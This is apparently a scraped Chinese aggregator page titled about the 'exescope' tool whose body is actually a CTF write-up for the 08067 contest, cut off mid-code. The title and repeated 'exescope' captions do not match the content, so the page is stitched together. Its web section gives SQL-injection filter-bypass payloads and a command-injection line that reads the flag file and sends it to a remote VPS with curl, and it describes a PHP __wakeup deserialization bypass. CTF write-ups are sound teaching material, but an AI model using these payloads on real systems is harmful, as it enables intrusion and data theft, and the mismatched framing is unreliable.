exescope(exescope是什么软件)

最近有很多读者朋友对exescope有疑问。由部分网友整理出相关内容希望能够解答你的疑惑,关于exescope是什么软件,本站也已经为你找到了问题的答案,希望能帮助到你。

exescope(exescope是什么软件)

作者:08067

预估稿费:300RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

比赛地址:ctf.08067.me

misc 100-1

http://misc.08067.me/misc4

misc 100-1 很简单,就是jsfuck和brianfuck两次编码,直接解出即可。

exescope(exescope是什么软件)

exescope(exescope是什么软件)

Misc 100-2

http://misc.08067.me/misc3/

Misc 100-2题目给的是一个图片,用winhex打开看到底部的密文

exescope(exescope是什么软件)

Base32解密得到:vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}

发现是凯撒加密,不过奇偶数移位方向不一样,发现偏移量是16,用脚本跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
str = "vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}"
for i in range(26):
key = ''
for x in str:
s = ord(x)
if (s not in range(97,123)) and (s not in range(65,91)):
key = key + chr(s)
else:
#print chr(s)
if s in range(97,123):
if s % 2 == 0:
s = s - i
if s not in range(97,123):
t = 97-s
t = 123-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(97,123):
t = s-122+96
key = key + chr(t)
else:
key = key + chr(s)
else:
#print chr(s)
if s % 2 == 0:
s = s - i
if s not in range(65,91):
t = 65-s
t = 91-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(65,91):
t = s-90+64
key = key + chr(t)
else:
key = key + chr(s)
print key

Misc 150

http://misc.08067.me/misc2/

打开wireshark数据包,提取http数据,得到一个flag.zip,

exescope(exescope是什么软件)

解压得到一个ce.txt文件,打开发现是一个rgb图片的像素点,然后用脚本还原即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image
import re
if __name__ == '__main__':
x = 887
y = 111
i = 0
j = 0
c = Image.new("RGB", (x,y))
file_object = open('ce.txt')
for i in range(0, x):
for j in range(0, y):
line = file_object.next()
lst = line.split(",")
c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
c.show()
c.save("c.png")

web 200-1

http://web1.08067.me/

注入,过滤了空格、#、*、union、like、regexp、and、or、|、–、&、%0a、%0b、%0c、%0d等,需要想办法用其他操作符连接注入语句和闭合’。

mysql操作符参考:http://blog.csdn.net/yuzongtao/article/details/45044963

几个可用的poc:

1
uname='!=!!(ascii(mid((passwd)from(1)))=99)!=!!'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)%'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)^'1&passwd=dddd
1
uname=12'-(length(trim(leading%a0'c12'%a0from%a0passwd))<32)-'0&passwd=1

来到后台,可以执行命令,但是对反弹shell的一些关键字做了过滤,对空格也做了过滤,只能通过cat读取flag,没又回显,然后打到用远程vps的日志上面

exp:

curl$IFS\vps:1234/`cat$IFS\../../flag`

exescope(exescope是什么软件)

exescope(exescope是什么软件)

web 200-2

http://web3.08067.me/

这道题主要是考察了php底层 wakeup 的一个bug,https://bugs.php.net/bug.php?id=72663

这道题根据tips:编辑器,可以考虑到.bak文件泄露

通过 robots.txt 发现了 function.php commom.php ,

最后找到了 function.php.bak index.php.bak

我们就获得了 整道题的代码

Index.php.bak

exescope(exescope是什么软件)

我们可以看见了这里 通过 cookie 的登陆

/function.php.bak

exescope(exescope是什么软件)

其他过滤代码 在该文件都可以得到

addslashes_deep() 是无法绕过的,我们就只能绕过wakeup

根据那个bug 的描述,我们直接进入 __destruct() ,这里我们取出了 $this->name

$this->name 是base64decode后,然后反序列化得到的,不用考虑waf等东西

我们看了这里只有一个 Checksql($sql)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
//sql 过滤
static function CheckSql($db_string,$querytype='select')
{
$clean='';
$error='';
$old_pos=0;
$pos=-1;
if($querytype=='select')
{
$notallow1="[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
if(preg_match("/".$notallow1."/i", $db_string))
{
exit("Error");
}
}
//完整的SQL检查
while (TRUE)
{
$pos=strpos($db_string, '\'', $pos + 1);
if ($pos===FALSE)
{
break;
}
$clean .=substr($db_string, $old_pos, $pos - $old_pos);
while (TRUE)
{
$pos1=strpos($db_string, '\'', $pos + 1);
$pos2=strpos($db_string, '\\', $pos + 1);
if ($pos1===FALSE)
{
break;
}
elseif ($pos2==FALSE || $pos2 > $pos1)
{
$pos=$pos1;
break;
}
$pos=$pos2 + 1;
}
$clean .='$s

主题测试文章,只做测试使用。发布者:艾迪号,转转请注明出处:https://www.cqaedi.cn/baike/19542.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年 12月 13日 上午4:53
下一篇 2022年 12月 13日 上午6:05

相关推荐

  • 般若纹身含义(艺伎般若纹身含义)

    最近有很多读者朋友对般若纹身含义有疑问。由部分网友整理出相关内容希望能够解答你的疑惑,关于艺伎般若纹身含义,本站也已经为你找到了问题的答案,希望能帮助到你。 般若纹身赏析

    百科大全 2023年 4月 10日
    00
  • 徒有其表下一句是什么(徒有其表下一句是什么成语)

    最近有很多读者朋友对徒有其表下一句是什么有疑问。有网友整理了相关内容,希望能回答你的疑惑。这个网站已经为你找到了问题的答案,希望对你有所帮助。 在大多数人看来,大学生活非常舒适,课程安排不像高中那么满,不需要受到老师的纪律,有足够的业余时间,可以做他们喜欢做的事,不用担心被父母责骂。 在长期的高压学习状态下,中国学生渴望彻底放松一次,此外,平时的学习和生活都…

    百科大全 2023年 3月 29日
    00
  • 红莲哥斯拉图片,十大最强哥斯拉排行榜?

    十大最强哥斯拉排行榜? 1、红莲哥斯拉 哥斯拉怪兽排名第一的是红莲哥斯拉,曾在《哥斯拉vs太空哥斯拉》、《哥斯拉2:怪兽之王》中出场,红莲第一阶段身体大面积皮肤变红并冒出蒸汽,吐出红色的光线,体温会由于愤怒而不断上升,达到1200摄氏度进入最后阶段,此时炉心熔毁,哥斯拉自身也最终熔化而死,放射出的能量足以毁灭地球,在《哥斯拉2:怪兽之王》当中,哥斯拉吸收了魔…

    百科大全 2023年 8月 4日
    00
  • 中国象棋特级大师最新排名,象棋特级大师实力排名?

    象棋特级大师实力排名? 2022年5月份,中国象棋协会最新等级分排名,前十强特级大师依次为: 1.外星人王天一 2.蜀山剑侠郑惟桐 3.玉面佛蒋川 4.六脉神剑赵鑫鑫 5.乱战天王洪智 6.少年姜太公许银川 7.孟辰 8.汪洋 9.郝继超 10.羊城大帅吕钦 世界象棋特级大师排名? 象棋大师排名:有杨官璘、胡荣华、李义庭、柳大华、李来群等。 1、杨官璘,19…

    百科大全 2023年 8月 6日
    00
  • 春风荡漾,春风荡漾电视剧演员表

    “春风荡漾”是自然界最美妙的景象之一,它象征着春天的到来,带给人们温暖和希望。春风轻轻吹拂着大地,带来了新的生机和活力。在这个季节里,万物复苏,花开满园,树木抽出新芽,草地变得翠绿。春风荡漾的景象让人心情愉悦,身心舒畅。无论是在田野里,还是在城市的街头巷尾,我们都能感受到春风的温柔和力量。春风荡漾的景象也启发了人们的创造力和想象力,激发了人们对美的追求。春风…

    百科大全 2023年 7月 16日
    00

站长QQ

7401002

在线咨询: QQ交谈

邮件:7401002@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信